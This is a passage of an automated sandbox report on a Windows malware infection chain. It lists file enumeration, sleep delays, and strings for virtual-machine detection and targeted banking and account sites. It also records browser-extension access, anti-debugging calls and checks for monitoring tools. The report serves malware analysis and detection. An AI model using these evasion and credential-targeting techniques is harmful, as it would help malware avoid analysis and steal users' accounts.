Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF68459E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	11_2_00007FF68459E440
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF684569B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF684569B00
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845C070C FindFirstFileExW,	11_2_00007FF6845C070C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D5FA54 FindFirstFileExW,	12_2_00007FF711D5FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4CD08 FindClose,FindFirstFileExW,GetLastError,	12_2_00007FF711D4CD08
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4CD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	12_2_00007FF711D4CD7C
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD69B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	13_2_00007FF61DD69B00
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD9E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	13_2_00007FF61DD9E440
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DD9E3CC FindClose,FindFirstFileExW,GetLastError,	13_2_00007FF61DD9E3CC
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDC070C FindFirstFileExW,	13_2_00007FF61DDC070C

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Thread delayed: delay time: 50000
Source: C:\Windows\System32\audiodg.exe	Thread delayed: delay time: 50000
Source: C:\Windows\System32\audiodg.exe	Thread delayed: delay time: 50000
Source: C:\Windows\System32\msiexec.exe	Thread delayed: delay time: 50000
Source: C:\Windows\System32\msiexec.exe	Thread delayed: delay time: 50000
Source: C:\Windows\System32\msiexec.exe	Thread delayed: delay time: 50000
Source: C:\Windows\explorer.exe	Thread delayed: delay time: 90000
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\

Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 602c785fe5.exe, 0000001B.00000003.2512849044.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2517175152.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2512575874.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2517529110.000000000121A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWrT?
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: explorer.exe, 00000014.00000003.3077307447.00000000096A3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE496000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2773D6000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64546000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, 602c785fe5.exe, 0000001B.00000003.2512849044.00000000011F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE48C000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE48C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW'g
Source: explorer.exe, 00000014.00000000.2202639819.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWIT1o
Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTbrVMWare
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: skotes.exe, skotes.exe, 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: firefox.exe, 0000002B.00000002.2484555408.000002392C0F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64626000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{z
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2668885421.0000000001403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: explorer.exe, 00000014.00000000.2202639819.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: file.exe, 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10021
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10038
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10056
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-9999
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10055
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10020
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10037

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process queried: DebugPort
Source: C:\Windows\System32\audiodg.exe	Process queried: DebugPort
Source: C:\Windows\System32\msiexec.exe	Process queried: DebugPort
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process queried: DebugPort
